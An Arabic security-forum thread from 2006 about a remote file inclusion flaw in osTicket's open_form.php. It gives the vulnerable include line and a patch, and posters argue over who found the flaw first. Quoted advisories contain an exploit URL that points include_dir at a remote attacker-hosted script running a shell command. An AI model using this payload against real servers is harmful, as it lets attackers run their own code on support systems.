الويب العربي

الويب العربي (http://www.arabwebtalk.com/index.php)
-   أمن المعلومات (http://www.arabwebtalk.com/forumdisplay.php?f=13)
-   -   ثغره سكرب الدعم الفني عن طريق التذاكر osTicket (http://www.arabwebtalk.com/showthread.php?t=39078)

Speedhosting.info 14-10-2006 09:07 PM
ثغره سكرب الدعم الفني عن طريق التذاكر osTicket
 
بسم الله الرحمن الرحيم
=-=-=-=-=-=-=-=-=
السكرب المصاب :- osTicket, Open Source Support Ticket System
وهو مستخدم في معظم الموقع العربيه
موقع الشركه :- http://www.osticket.com
نوع الثغره :- Remote File Inclusion خطيره جداا
مكتشف الثغره :- rUnViRuS
موقع :- http://www.sec-area.com/
=-=-=-=-=-=-=-=-=-=-=-=-=
ملف الثغر :- open_form.php
موجود في ملف include
الكود المصاب :-
كود:
<? include("$include_dir/form.php"); ?>
الترقيع :-
كود:
<? include("include/form.php"); ?>
وينصح مسح السكرب كامل او التغير الي الصادره الحديثه

تحيات
Speedhosting.info

mr_sultan 15-10-2006 01:01 AM
انت حاط المكتشف rUnViRuS ليش تكذب

الثغره قديمه مره ولها خمسة شهور واللي مكتشفها فريق سايت داون : سويت ديفل وبلاك كود
الثغره بتاريخ : 30 / 5 / 2006 م
إسم السكربت : osticket
الإصدار : Support cards v1
نسبة الخطوره : عالية جدا
المكتشف
( team : site-down ( SwEET-DeViL & BlaCK-CoDE



وهذا الاثبات
رسالة ارسلة مواقع السكورتي

http://www.securityfocus.com/archive/1/435413

وهذا مكتشف الثغره طارحها بنفسها

http://www.lezr.com/vb/showthread.php?t=13774

يعني اذا بتكتب مره ثانيه اكتب الحقائق :rolleyes:

Speedhosting.info 16-10-2006 04:21 AM
يا اخي الثغره برده rUnViRuS منزله في سكيروتي فوكس وانا لم اري غير rUnViRuS في سكيروتي فوكس من كام يوم

mr_sultan 16-10-2006 04:33 AM
شوف مقارنه بين تاريخ الاكتشافين....

أولا : فريق team : site-down

كود PHP:
file include exploit in Support Cards v1 May 30 2006 08:26PM
black code (black-cod3 hotmail com
file include exploit in Support Cards v1

forum type Support cards v1
bug found by sweet-devil
team site-down
type file include

####################################################
exploit :

http://www.example.com/support/include/open_form.php?include_dir=http://
ursite/evilscript.txt?cmd=pwd

####################################################

#######################
emails:

black-cod3 (athotmail (dotcom [email concealed] & gamr-14 (athotmail (dotcom [email concealed]
#######################

All my respect to our friends lezr.com g123g.net

done .. peace 


ولو تلاحظ تاريخ الإكتشاف May 30 2006 08:26PM يعني 30 / 5 / 2006 ونحن الآن في 14 / 10 /2006


ام بنسبة للأخ rUnViRuS

كود PHP:
WDT:- osTicket File Include all V Oct 14 2006 12:26AM
stormhacker hotmail com 
script:- osTicket Open Source Support Ticket System
site:- http://www.osticket.com

exploit by runvirus
http://www.host/path/include/open_form.php?include_dir=

welcome in www.sec-area.com 
ولو تلاحظ تاريخ الإكتشاف أمس بالصباح الساعه 12 14 / 10 /2006 فرق شاسع بين الإكتشاف الأول واالثاني
:)

AlwAdy4HosT 02-11-2006 06:40 AM
يا عررررب الامر ماهو حرب سواء ده او ده المهم في الاخر انها ثغره ويجب ترقيعها :d
خلى عقلك اكبر من كده
جزاكم الله خير :)

mazahm 11-02-2007 11:55 PM
تم ترقيع؟؟؟؟؟؟؟؟؟؟؟؟


جميع الأوقات بتوقيت مكة المكرمة. الساعة الآن » 01:19 PM.

Powered by vBulletin
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Copyright © ArabWebTalk.Com 2004-2012